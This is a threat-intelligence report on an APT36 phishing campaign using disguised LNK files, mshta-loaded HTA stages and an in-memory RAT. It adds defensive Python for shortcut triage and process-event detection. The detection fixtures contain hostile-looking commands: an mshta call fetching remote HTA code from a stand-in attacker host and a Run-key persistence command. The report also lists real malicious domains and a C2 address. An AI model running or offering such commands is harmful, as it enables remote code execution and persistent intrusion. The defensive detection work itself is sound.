APT36, also known as Transparent Tribe, ProjectM, Mythic Leopard, TEMP.Lapis, Copper Fieldstone, Earth Karkaddan, STEPPY-KAVACH, Green Havildar, APT-C-56, Storm-0156, and Opaque Draco, continues its persistent cyber-espionage operations targeting Indian governmental and academic institutions. First observed on December 15, 2025, this latest APT36 campaign demonstrates how a single convincing click can quietly establish long-term espionage access through sophisticated fileless malware techniques.
The APT36 attack chain begins with carefully crafted spear-phishing emails delivering ZIP archives disguised as legitimate examination material targeting Indian government and academic personnel. Inside the APT36 malicious archive, victims encounter a deceptively named Windows shortcut file masquerading as a PDF document, exploiting Windows’ default behavior of hiding file extensions. This weaponized APT36 LNK shortcut embeds a full PDF structure to reinforce legitimacy while silently launching mshta.exe, a trusted Windows utility, to retrieve and execute attacker-controlled HTA content directly in memory.
The APT36 fileless infection unfolds through multiple sophisticated stages designed to evade traditional file-based security controls. The initial APT36 “ReadOnly” stage reconstructs a serialized .NET object in memory and deliberately weakens built-in deserialization safeguards, paving the way for the “WriteOnly” stage which loads a larger malicious DLL entirely in memory. Throughout the APT36 infection process, victims see a legitimate PDF document displayed on their screens, reinforcing the illusion of normal activity while the APT36 Remote Access Trojan quietly initializes in the background.
At the core of the APT36 operation is a fully featured Remote Access Trojan that profiles host environments, queries installed antivirus solutions via Windows Management Instrumentation, and dynamically adapts persistence mechanisms to evade detection by security software. The APT36 malware deploys tailored execution paths using startup shortcuts, batch files, registry modifications, or obfuscated HTA loaders depending on detected security software. APT36 command-and-control communication is encrypted, enabling remote command execution, file access, screen capture, clipboard manipulation, and extensive data theft from compromised Indian government systems without raising immediate security alarms.
APT36, operating under multiple aliases including Transparent Tribe, continues to demonstrate its unwavering focus on cyber-espionage operations targeting Indian governmental and strategic entities. This latest APT36 campaign reflects a deliberate and methodical approach by the threat actor, prioritizing stealth, persistence, and long-term intelligence collection over immediate disruption of target networks. By blending sophisticated social engineering with advanced technical capabilities, the APT36 threat actor leverages trusted Windows components and familiar document formats to infiltrate sensitive Indian government environments while minimizing suspicion and forensic visibility.
The APT36 attack chain begins with carefully crafted spear-phishing emails delivering ZIP archives disguised as legitimate examination material specifically tailored to Indian government and academic target audiences. Inside the APT36 malicious archive, victims encounter a deceptively named shortcut file masquerading as a PDF, exploiting Windows’ tendency to hide file extensions from users. Unlike typical shortcuts, this oversized APT36 LNK file embeds a full PDF structure internally, reinforcing its perceived legitimacy when victims inspect file properties.
When the APT36 weaponized shortcut is executed, it silently launches mshta.exe, a trusted Windows utility commonly used for legitimate HTML applications, to retrieve and execute attacker-controlled HTA content directly in memory. This APT36 technique effectively bypasses traditional file-based security controls that rely on scanning files written to disk, as the malicious HTA payload never persists in the filesystem during initial execution.
Once the APT36 HTA loader is active, the infection unfolds in multiple carefully orchestrated stages designed to prepare victim systems for deeper compromise. The initial APT36 “ReadOnly” stage reconstructs a serialized .NET object entirely in memory and deliberately weakens built-in .NET deserialization safeguards, opening the door for unsafe operations that would normally be blocked. This paves the way for the APT36 “WriteOnly” stage, which loads a larger malicious DLL entirely in memory without ever touching the disk.
Throughout this APT36 multi-stage infection process, the malware displays a legitimate PDF document to victims, carefully reinforcing the illusion of normal document-viewing activity while malicious APT36 components quietly initialize and establish persistence in the background without raising user suspicion.
At the core of the APT36 operation is a fully featured Remote Access Trojan that grants attackers covert, long-term control over infected Indian government systems. The APT36 malware profiles the host environment through comprehensive system reconnaissance, queries installed antivirus and security solutions via Windows Management Instrumentation, and dynamically adapts its persistence mechanisms based on detected security software to maximize evasion probability.
Depending on the specific security software present on compromised systems, the APT36 RAT deploys tailored execution paths using Windows startup shortcuts, batch files, registry Run key modifications, or obfuscated HTA loaders designed to survive system reboots while evading detection by endpoint security products. APT36 command-and-control communication is fully encrypted, enabling secure remote command execution, comprehensive file system access, real-time screen capture, clipboard data manipulation, and extensive data exfiltration capabilities without raising immediate security alarms.
This APT36 campaign highlights the threat actor’s continued evolution toward more resilient, security-aware intrusion frameworks specifically designed to compromise high-value Indian government targets. By abusing trusted Windows utilities like mshta.exe, embedding malicious logic within seemingly benign files, and maintaining a modular multi-stage execution model, the APT36 group effectively blends into normal user activity while sustaining persistent access for long-term intelligence collection operations.
Windows shortcut (LNK) files can execute hidden commands and launch malicious payloads, as demonstrated in the APT36 fileless campaign. Users should avoid opening unexpected shortcut files, even if they appear to be PDFs or legitimate documents. Organizations should implement user awareness training specifically highlighting APT36 social engineering tactics and the dangers of disguised LNK files in phishing campaigns targeting Indian government entities.
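The following triage heuristic is an added example, not code from the original report: it scores a Windows shortcut on the traits the campaign description above names (a document-looking double extension, a PDF structure embedded inside the LNK body, an oversized file, and a script host such as mshta.exe in the link's string data). The sample specimen and the `example.invalid` URL are constructed for the demonstration.

```python
from __future__ import annotations

# Shell Link header: HeaderSize 0x4C followed by the fixed LNK CLSID.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
OVERSIZED = 64 * 1024          # genuine shortcuts are normally a few KiB
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell")


def triage_lnk(name: str, data: bytes) -> list[str]:
    """Return heuristic findings for one file; an empty list means nothing notable."""
    findings: list[str] = []
    if not data.startswith(LNK_MAGIC):
        return findings                      # not a Shell Link file at all
    lowered = name.lower()
    stem = lowered[:-4] if lowered.endswith(".lnk") else lowered
    if stem.endswith(DOC_EXTS):
        findings.append("double extension: document-looking name hides .lnk")
    body = data[0x4C:]
    if b"%PDF-" in body:
        findings.append("embedded PDF structure inside shortcut")
    if len(data) > OVERSIZED:
        findings.append(f"oversized shortcut ({len(data)} bytes)")
    for host in SCRIPT_HOSTS:
        # LNK string data is UTF-16LE; also check plain ASCII for robustness
        if host.encode("utf-16-le") in body or host.encode() in body:
            findings.append(f"target invokes script host: {host}")
            break
    return findings


def build_sample() -> bytes:
    """Constructed specimen mimicking the oversized PDF-lookalike LNK described above."""
    header = LNK_MAGIC + b"\x00" * (0x4C - len(LNK_MAGIC))
    args = "mshta.exe https://example.invalid/notice.hta".encode("utf-16-le")
    decoy = b"%PDF-1.4\n" + b"%% decoy document body\n" * 4000
    return header + args + decoy


if __name__ == "__main__":
    for n, d in [("Exam_Schedule.pdf.lnk", build_sample()), ("readme.txt", b"hello")]:
        print(n, "->", triage_lnk(n, d) or ["clean"])
```

The double-extension check only matters because Explorer hides known extensions by default; enabling extension display on user workstations removes that part of the lure.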
Monitor and restrict the use of mshta.exe, wscript.exe, and similar Windows script hosts that APT36 abuses for fileless execution. Implement application control policies that block these utilities unless a legitimate business need requires them. Deploy behavioral monitoring for the APT36 tradecraft described above, in particular mshta.exe being launched from unexpected parent processes or by user-initiated actions such as opening a shortcut, and mshta.exe retrieving HTA content from a remote location rather than a local file.
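As an added example (not code from the original report), the rules below run over constructed Sysmon-style process-creation records and flag the three behaviours the mitigation above and the persistence section describe: a script host fetching remote HTA content, a script host started by a user-facing parent, and a Run-key write issued from a script host. Field names, process paths and the `attacker.invalid` hostname are assumptions for the demonstration.

```python
import re

WATCHED = {"mshta.exe", "wscript.exe", "cscript.exe"}
USER_PARENTS = {"explorer.exe", "outlook.exe", "winword.exe"}
REMOTE = re.compile(r"https?://|\\\\", re.I)          # URL or UNC path argument
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)

# Constructed Sysmon EventID 1-style records; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://attacker.invalid/notice.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\ui\wizard.hta"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run '
                    r'/v Updater /t REG_SZ /d "mshta.exe C:\Users\Public\n.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list[str]:
    """Return the names of the rules one process-creation event triggers."""
    img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    if img in WATCHED and REMOTE.search(cmd):
        hits.append("lolbin_remote_content")      # HTA pulled from the network, never on disk
    if img in WATCHED and parent in USER_PARENTS:
        hits.append("lolbin_user_launched")       # user opened a shortcut or attachment
    if RUN_KEY.search(cmd) and parent in WATCHED:
        hits.append("run_key_from_script_host")   # persistence written by a script host
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that fired at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := evaluate(ev))]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The second record (a vendor installer running a local .hta) produces no hit, which is the kind of legitimate use the application control exception list has to accommodate.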
Isolate sensitive Indian government systems from general user networks to limit APT36 lateral movement following initial compromise. Implement strict egress filtering to detect and block unauthorized command-and-control communication used by APT36 Remote Access Trojans. Deploy network monitoring specifically targeting encrypted communication patterns characteristic of APT36 C2 infrastructure.
Deploy next-generation antivirus and endpoint detection and response solutions specifically configured to identify and block APT36 fileless malware techniques. Leverage behavioral analysis and machine learning-based detection to identify suspicious activity patterns characteristic of APT36 multi-stage infections, including in-memory .NET object deserialization, DLL injection, and dynamic persistence mechanism deployment. Implement memory scanning capabilities to detect APT36 malware operating entirely in RAM without filesystem artifacts.
SHA256 Hashes:
Malicious Domains: innlive[.]in, drjagrutichavan[.]com
C2 IP Address: 2[.]56[.]10[.]86